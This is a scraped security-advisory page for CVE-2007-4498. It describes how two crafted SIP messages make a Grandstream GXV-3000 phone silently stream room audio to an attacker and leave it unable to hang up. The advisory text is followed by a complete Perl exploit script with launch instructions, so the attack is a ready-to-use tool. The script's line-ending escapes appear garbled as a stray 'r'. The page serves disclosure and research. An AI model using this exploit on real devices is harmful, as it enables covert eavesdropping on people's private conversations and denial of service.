|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Remote eavesdropping with SIP Phone GXV-3000
|
SecurityAlert : 3059
CVE : CVE-2007-4498
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : Radu State
Published : 27.08.2007
Affected Software : | SIP Phone GXV-3000 |
 Advisory Content : While playing with the SIP Madynes stateful fuzzer (for a description
see
http://hal.inria.fr/inria-00166947/en), we have realized that some SIP
stack
engines have serious bugs allowing to an attacker to automatically make a
remote phone accept the call
without ringing and without asking the user to take the phone from the
hook, such that the attacker might be able to listen to all conversations
that take place in the remote room without being noticed.
One example that we can disclose (vendor was notified on 10 th May 2007)
is the following: Grandstream SIP Phone GXV-3000
MADYNES Security Advisory : SIP remote attack on Grandstream SIP Phone
GXV-3000
Date of Discovery 7 th May, 2007
ID: KIPH7
Background
SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate
and
maintain a communication session.
Affected devices: Grandstream SIP Phone GXV-3000 with latest available
firmware 1.0.1.7 Loader-- 1.0.0.6 Boot--1.0.0.18
Impact :
A malicious user can remotely eavesdrop (a remote location) and perform
DOS
on a remote phone.
Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations.
The vulnerability is based in a sequence of two messages, where both
messages are syntactically right, but together they turn the device in an
inconsistent state, where the RTP is now send to the attacker/
ougui at 152.81.48.94:5060 is the attacker
1005 at 152.81.48.88:5060 the attacked phone
X ----------------------- INVITE ------------------->
GXV-3000
X <------------------ 100 Trying -----------------
GXV-3000
X <--------------- 180 Ringing -------------------
GXV-3000
X ------------- 183 Session Progress -------> GXV-3000
X <-----------RTP - FLOW ------------------------
GXV-3000
After these messages the device is not able to hang up so a remote DOS
can
be also done
Credits:
* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)
Exploit Code :
To run the exploit the file Grandstream-GXV3000.pl should be launched
(assuming our configurations) as:
perl Grandstream-GXV3000.pl 152.81.48.88 5060 humbol 152.81.48.94 5060
ougui
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);
$socket=new IO::Socket::INET->new(
Proto=>'udp',
LocalPort => $ARGV[4],
PeerPort=>$ARGV[1],
PeerAddr=>$ARGV[0]);
$sdp= "v=0r
o=username 0 0 IN IP4 $ARGV[3]r
s=The Funky Flowr
c=IN IP4 $ARGV[3]r
t=0 0r
m=audio 33404 RTP/AVP 3 97 0 8r
a=rtpmap:0 PCMU/8000r
a=rtpmap:3 GSM/8000r
a=rtpmap:8 PCMA/8000r
a=rtpmap:97 iLBC/8000r
a=fmtp:97 mode=30rn";
$sdplen= length $sdp;
$msg= "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]r
From: <sip:$ARGV[5]@$ARGV[3]>r
To: <sip:$ARGV[2]@$ARGV[0]>r
Contact: <sip:$ARGV[5]@$ARGV[3]>r
Call-ID: ougui@$ARGV[3]r
CSeq: 10419 INVITEr
Max-Forwards: 70r
Content-Type: application/sdpr
Content-Length: $sdplenr
r
$sdp";
$socket->send($msg);
sleep(3);
$msg=
"SIP/2.0 183 Session Progressr
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]r
From: <sip:$ARGV[5]@$ARGV[3]>r
To: <sip:$ARGV[2]@$ARGV[0]>r
Call-ID: ougui@$ARGV[3]r
CSeq: 10419 INVITEr
Max-Forwards: 70r
Contact: <sip:$ARGV[5]@$ARGV[3]>r
Content-Type: application/sdpr
Content-Length: $sdplenr
r
$sdp";
$socket->send($msg);
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|